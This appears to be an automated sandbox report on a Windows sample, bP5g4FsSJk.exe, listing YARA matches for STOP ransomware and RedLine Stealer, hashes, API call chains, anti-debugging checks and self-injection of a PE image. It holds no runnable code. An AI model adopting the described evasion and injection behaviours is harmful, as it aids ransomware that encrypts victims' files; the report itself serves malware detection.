Source: 1.0.bP5g4FsSJk.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.bP5g4FsSJk.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.bP5g4FsSJk.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.bP5g4FsSJk.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.bP5g4FsSJk.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.bP5g4FsSJk.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.bP5g4FsSJk.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.bP5g4FsSJk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.2.bP5g4FsSJk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.bP5g4FsSJk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.bP5g4FsSJk.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.bP5g4FsSJk.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.bP5g4FsSJk.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.bP5g4FsSJk.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.bP5g4FsSJk.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.0.bP5g4FsSJk.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.bP5g4FsSJk.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.bP5g4FsSJk.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.bP5g4FsSJk.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.271002067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.278389009.0000000004235000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.275253694.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000001.00000000.275253694.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.275253694.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.272842398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000001.00000000.272842398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.272842398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.278746171.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.274561888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000001.00000000.274561888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.274561888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: bP5g4FsSJk.exe PID: 5468, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: bP5g4FsSJk.exe PID: 5604, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_00419F90	1_2_00419F90
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0040C070	1_2_0040C070
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0042E003	1_2_0042E003
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0042F010	1_2_0042F010
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_00410160	1_2_00410160
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0040D240	1_2_0040D240
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0044237E	1_2_0044237E
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_004344FF	1_2_004344FF
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_00449506	1_2_00449506
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0043E5A3	1_2_0043E5A3
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0044B5B1	1_2_0044B5B1
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0040A660	1_2_0040A660
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0041E690	1_2_0041E690
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0040274E	1_2_0040274E
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0040A710	1_2_0040A710
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0040F730	1_2_0040F730
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0044D7A1	1_2_0044D7A1
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0042C804	1_2_0042C804
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0044D9DC	1_2_0044D9DC
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_00449A71	1_2_00449A71
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_00443B40	1_2_00443B40
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0044ACFF	1_2_0044ACFF
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0040DD40	1_2_0040DD40
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0040BDC0	1_2_0040BDC0
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0042CE51	1_2_0042CE51
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_00420F30	1_2_00420F30
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_00449FE3	1_2_00449FE3

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: String function: 0042F7C0 appears 37 times
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: String function: 0044F23E appears 44 times
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: String function: 00428520 appears 51 times
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: String function: 004547A0 appears 31 times

Source: bP5g4FsSJk.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bP5g4FsSJk.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bP5g4FsSJk.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bP5g4FsSJk.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: bP5g4FsSJk.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: bP5g4FsSJk.exe

ReversingLabs: Detection: 52%

Source: bP5g4FsSJk.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\bP5g4FsSJk.exe "C:\Users\user\Desktop\bP5g4FsSJk.exe"
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Process created: C:\Users\user\Desktop\bP5g4FsSJk.exe "C:\Users\user\Desktop\bP5g4FsSJk.exe"
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Process created: C:\Users\user\Desktop\bP5g4FsSJk.exe "C:\Users\user\Desktop\bP5g4FsSJk.exe"	Jump to behavior

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal84.rans.troj.evad.winEXE@3/0@1/1

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Code function: 1_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,

1_2_0040D240

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Code function: 1_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,

1_2_00411900

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Code function: 0_2_042357C6 CreateToolhelp32Snapshot,Module32First,

0_2_042357C6

Source: bP5g4FsSJk.exe	String found in binary or memory: set-addPolicy
Source: bP5g4FsSJk.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: bP5g4FsSJk.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: bP5g4FsSJk.exe, bP5g4FsSJk.exe, 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: 9IC:\nedunesa\gihex\gakubeki53_gaboru\lulod mamere\hexumax.pdb` source: bP5g4FsSJk.exe
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: bP5g4FsSJk.exe, 00000000.00000002.278746171.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\nedunesa\gihex\gakubeki53_gaboru\lulod mamere\hexumax.pdb source: bP5g4FsSJk.exe

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 0_2_042380AF push ecx; retf		0_2_042380B2
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_00428565 push ecx; ret		1_2_00428578

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Code function: 1_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,

1_2_00412220

Source: initial sample

Static PE information: section name: .text entropy: 7.945996199237986

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_1-30694

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Code function: 0_2_0423671C rdtsc

0_2_0423671C

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Evaded block: after key decision

graph_1-30667

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

API coverage: 6.8 %

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,

1_2_0040E670

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,		1_2_00410160
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,		1_2_0040F730

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

API call chain: ExitProcess graph end node

graph_1-30696

Source: bP5g4FsSJk.exe, 00000001.00000002.286856498.000000000091A000.00000004.00000020.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000002.286593471.00000000008EF000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Code function: 1_2_00424168 _memset,IsDebuggerPresent,

1_2_00424168

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Code function: 1_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_0042A57A

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

1_2_00412220

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Code function: 1_2_00447CAC __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

1_2_00447CAC

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Code function: 0_2_0423671C rdtsc

0_2_0423671C

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Code function: 0_2_042350A3 push dword ptr fs:[00000030h]

0_2_042350A3

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		1_2_004329EC
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_004329BB SetUnhandledExceptionFilter,		1_2_004329BB

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Memory written: C:\Users\user\Desktop\bP5g4FsSJk.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

